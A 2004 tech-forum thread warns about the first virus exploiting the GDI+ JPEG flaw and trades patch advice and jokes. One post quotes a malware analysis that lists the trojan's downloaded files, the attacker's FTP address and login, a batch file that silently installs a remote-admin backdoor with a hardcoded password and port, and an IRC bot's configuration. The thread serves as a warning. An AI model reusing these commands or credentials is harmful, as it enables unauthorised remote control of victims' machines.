Sadly, the worlds first JPEG virus is real. Mark your calendars

Discussion in 'OT Technology' started by SeedyRom, Sep 28, 2004.

  1. SeedyRom

    SeedyRom :Twin Turbos:

    Joined:
    Nov 30, 2000
    Messages:
    37,883
    Likes Received:
    17
    Location:
    SoCal
    Many of us know of the recent exploit posted to the MS forums and here's the first actual virus associated with it. And yes, you CAN get it just by viewing the .jpg (which right now isn't an actual image but still a .jpg in 8k of code).

    Times are a changing.

    http://it.slashdot.org/it/04/09/27/2319222.shtml?tid=172&tid=218

    EDIT
    Since people seem to think they know everything and that this isn't a big deal, here's a mini FAQ for you:

    1) YES, it can infect from a hosted image and not just a download. If you aren't protected, this can happen. Links and proof within the thread.

    2) NO Firefox doesn't guarantee you safety. That's a good start, but a downloaded image, or an image viewed in any number of viewing programs can execute it. Even an editing program. And guess what, Microsoft's patches do NOT secure other programs which leads to...

    3) Microsoft patches are NOT the cure-all for this. It's been documented that it only fixes THEIR GDI+ problems but dozens if not hundreds of other programs have their own unique GDI paths. Here's a LINK about this. Microsoft does not account for this and their patches don't either. However, it's still a good idea to get the MS patch. Here's a link for all infected versions

    4) No, it's not the end of the world...but you SHOULD take notice. Get your patches, use Firefox, update your virus programs every few days and be as safe as you can. If you are savvy and don't get hit, many, many others still will.
     
    Last edited: Sep 28, 2004
  2. M5_Elite

    M5_Elite New Member

    Joined:
    Mar 11, 2003
    Messages:
    4,906
    Likes Received:
    0
    Location:
    Houston, TX
    :wtc: hold me
     
  3. Matt-AWD

    Matt-AWD Active Member

    Joined:
    Sep 21, 2002
    Messages:
    38,663
    Likes Received:
    1
    Location:
    OR
    Oh


















































    I'm using firefox :wiggle:
     
  4. SeedyRom

    SeedyRom :Twin Turbos:

    Joined:
    Nov 30, 2000
    Messages:
    37,883
    Likes Received:
    17
    Location:
    SoCal
    Here's what the Easynews guys who documented the first hit on their newsgroups servers had to say about it. I'm not going to post the actual link to it or the code just to cover my own ass. Some script kiddie asshat will nodoubt rehash it soon anyway. The bitch installs VNC (popular remote viewing software) and phones home as many do.

    If you don't know what a jpeg virus is, check out:
    http://news.google.com/news?q=jpeg+virus

    Swany and I wrote a quick and nasty script to scan every jpeg that comes into Easynews.com.. It paged
    my cell phone at 6:47pm PDT on 9/26/2004 for the first hit, and 7:52pm PDT on 9/26/2004 for
    the second hit.

    Once this JPEG overflowed GDI+, it phoned home, connected to and ftp site and downloaded
    almost 2megs of stuff. It installs a trojan that installs itself as a service.

    It also installs radmin (radmin.com) running as 'r_server'. From the radmin.com site, "With Radmin you
    can work on a remote computer exactly as if you were right there at its keyboard."

    It phones home to the same IP that is in the usenet post headers. Then it seems
    to connect to xxx://209.171.43.27/www/system/ u/p bawz/pagdba (last time I checked, 93 users where logged in!)

    it downloads these files:

    -rw-r--r-- 1 root root 90112 Sep 27 09:43 AdmDll.dll
    -rw-r--r-- 1 root root 114688 Sep 27 09:43 Fport.exe
    -rw-r--r-- 1 root root 663 Sep 27 09:43 ServUStartUpLog.txt
    -rw-r--r-- 1 root root 32768 Sep 27 09:43 VNCHooks.dll
    -rw-r--r-- 1 root root 1407 Sep 27 09:43 WinRun.dll
    -rw-r--r-- 1 root root 811008 Sep 27 09:43 WinRun.exe
    -rw-r--r-- 1 root root 1268 Sep 27 09:43 driver.log
    -rw-r--r-- 1 root root 24576 Sep 27 09:43 drives.exe
    -rw-r--r-- 1 root root 150 Sep 27 09:43 execute.bat
    -rw-r--r-- 1 root root 0 Sep 27 09:43 filter3.ocx
    -rw-r--r-- 1 root root 1052 Sep 27 09:43 irc-u.cfg
    -rw-r--r-- 1 root root 0 Sep 27 09:43 irc-u.dat
    -rw-r--r-- 1 root root 16802 Sep 27 09:43 irc-u.debug.log
    -rw-r--r-- 1 root root 102400 Sep 27 09:43 irc-u.dll
    -rw-r--r-- 1 root root 26624 Sep 27 09:43 kill.exe
    -rw-r--r-- 1 root root 59392 Sep 27 09:43 nc.exe
    -rw-r--r-- 1 root root 241664 Sep 27 09:43 nvsvc.exe
    -rw-r--r-- 1 root root 36864 Sep 27 09:43 nvsvc32.dll
    -rw-r--r-- 1 root root 45056 Sep 27 09:43 omnithread_rt.dll
    -rw-r--r-- 1 root root 34304 Sep 27 09:43 peek.exe
    -rw-r--r-- 1 root root 29408 Sep 27 09:43 raddrv.dll
    -rw-r--r-- 1 root root 713 Sep 27 09:43 radmin.reg
    -rw-r--r-- 1 root root 26112 Sep 27 09:43 rcrypt.exe
    -rw-r--r-- 1 root root 40960 Sep 27 09:43 reg.exe
    -rw-r--r-- 1 root root 6656 Sep 27 09:43 uptime.exe
    -rw-r--r-- 1 root root 208896 Sep 27 09:43 vns.exe

    and executes 'execute.bat', which looks like:

    regedit.exe /s radmin.reg
    nvsvc.exe /install /silence
    nvsvc.exe /pass:hardcore /port:10002 /save /silence
    nvsvc.exe /start /silence
    net start r_server

    it also installs an irc client with this config info:
    server1=irc.p2pchat.net
    port1=7777
    login=Darkbro0d
    channel=#FurQ
    password=letmein
    nick1=Track100Mbit
    nick2=Trck100#1
    sfv=1
    user=Trackmaster
    login=darkbro0d
     
  5. SeedyRom

    SeedyRom :Twin Turbos:

    Joined:
    Nov 30, 2000
    Messages:
    37,883
    Likes Received:
    17
    Location:
    SoCal
    Read the articles :patshead:

    Firefox is affected unless you get the very latest version. Stay up to date people. Also, a future revision of this might not be as easily swayed.

    Also, many people still use email programs that don't have Firefox load the images....
     
  6. Matt-AWD

    Matt-AWD Active Member

    Joined:
    Sep 21, 2002
    Messages:
    38,663
    Likes Received:
    1
    Location:
    OR
    Newest version of firefox = not affected
     
  7. Turosh

    Turosh Guest

    no big deal
     
  8. Dr.Smasher

    Dr.Smasher .

    Joined:
    May 23, 2000
    Messages:
    19,854
    Likes Received:
    4
    Location:
    WI
    oh noes! my windoz haev crashet!
     
  9. Matt-AWD

    Matt-AWD Active Member

    Joined:
    Sep 21, 2002
    Messages:
    38,663
    Likes Received:
    1
    Location:
    OR
    Only the newest version :o
     
  10. Mustachio

    Mustachio New Member

    Joined:
    May 19, 2004
    Messages:
    3,327
    Likes Received:
    0
    :wiggle:
     
  11. SeedyRom

    SeedyRom :Twin Turbos:

    Joined:
    Nov 30, 2000
    Messages:
    37,883
    Likes Received:
    17
    Location:
    SoCal
    Yes, you're quick before the edit. I still wanted him to read it since not ALL Firefox is safe.
     
  12. LowkeyG

    LowkeyG OT Supporter

    Joined:
    Mar 4, 2002
    Messages:
    29,188
    Likes Received:
    0
    Location:
    Toronto
    which is that?
     
  13. SeedyRom

    SeedyRom :Twin Turbos:

    Joined:
    Nov 30, 2000
    Messages:
    37,883
    Likes Received:
    17
    Location:
    SoCal
    Call me when some disgruntled asshat goes wild on OT and it's shut down for an evening. I'll be bored without it. You can talk me to sleep ;)
     
  14. j1zzn1t

    j1zzn1t OT Supporter

    Joined:
    Dec 28, 2003
    Messages:
    12,074
    Likes Received:
    0
    Location:
    Dallas, TX
    i'm skeered. :wtc:
     
  15. NFS7

    NFS7 Shit, it burns!

    Joined:
    Oct 28, 2003
    Messages:
    15,280
    Likes Received:
    0
    Location:
    Los Santos, CA
    porn will nevAr be teh same again! :eek3:
     
  16. NFS7

    NFS7 Shit, it burns!

    Joined:
    Oct 28, 2003
    Messages:
    15,280
    Likes Received:
    0
    Location:
    Los Santos, CA
    now u can get viruses just as easily from secks in real life :hsugh:
     
  17. TracerBullet

    TracerBullet Active Member

    Joined:
    Aug 29, 2003
    Messages:
    155,094
    Likes Received:
    1
    Location:
    Scene of the Noodle Incident.
    If you happen to view the file with another image viewer you could be infected still.
     
  18. assclown

    assclown Active Member

    Joined:
    Mar 11, 2003
    Messages:
    92,231
    Likes Received:
    0
    Location:
    Brooklyn, NY
    It doesn't do shit unless you save it/open it with explorer.exe
     
  19. SeedyRom

    SeedyRom :Twin Turbos:

    Joined:
    Nov 30, 2000
    Messages:
    37,883
    Likes Received:
    17
    Location:
    SoCal
    I've been sending letters to companies for months from the open boxes I find in my line of work. It's kinda fun to see the responses :)
     
  20. SeedyRom

    SeedyRom :Twin Turbos:

    Joined:
    Nov 30, 2000
    Messages:
    37,883
    Likes Received:
    17
    Location:
    SoCal
    Which no one has ever done before, right?
     
  21. fyp619

    fyp619 New Member

    Joined:
    Aug 8, 2003
    Messages:
    4,112
    Likes Received:
    0
    Location:
    LBC
    new version = 1.0? i hope :x:
     
  22. TracerBullet

    TracerBullet Active Member

    Joined:
    Aug 29, 2003
    Messages:
    155,094
    Likes Received:
    1
    Location:
    Scene of the Noodle Incident.
    1.0PR ya
     
  23. assclown

    assclown Active Member

    Joined:
    Mar 11, 2003
    Messages:
    92,231
    Likes Received:
    0
    Location:
    Brooklyn, NY
    Most people think you can post it on a forum and it will steal their megahurtz :o
     
  24. dirteemac

    dirteemac hey, how are you?

    Joined:
    Nov 14, 2001
    Messages:
    7,776
    Likes Received:
    1
    It's times like this when I'm glad I have a mac.
     
  25. SeedyRom

    SeedyRom :Twin Turbos:

    Joined:
    Nov 30, 2000
    Messages:
    37,883
    Likes Received:
    17
    Location:
    SoCal
    Here's the other problem. Microsoft has their patch for the vulnerability but their patch is SERIOUSLY LACKING. Others in the IT field have been made aware of this. In fact, this guy sent an open letter to MS about it and made some news about it. He finds what their shit misses because there's a TON of other apps with their own GDI+ built on to it's own path. This is far more than a Microsoft product issue.

    http://isc.sans.org/gdiscan.php
     

Share This Page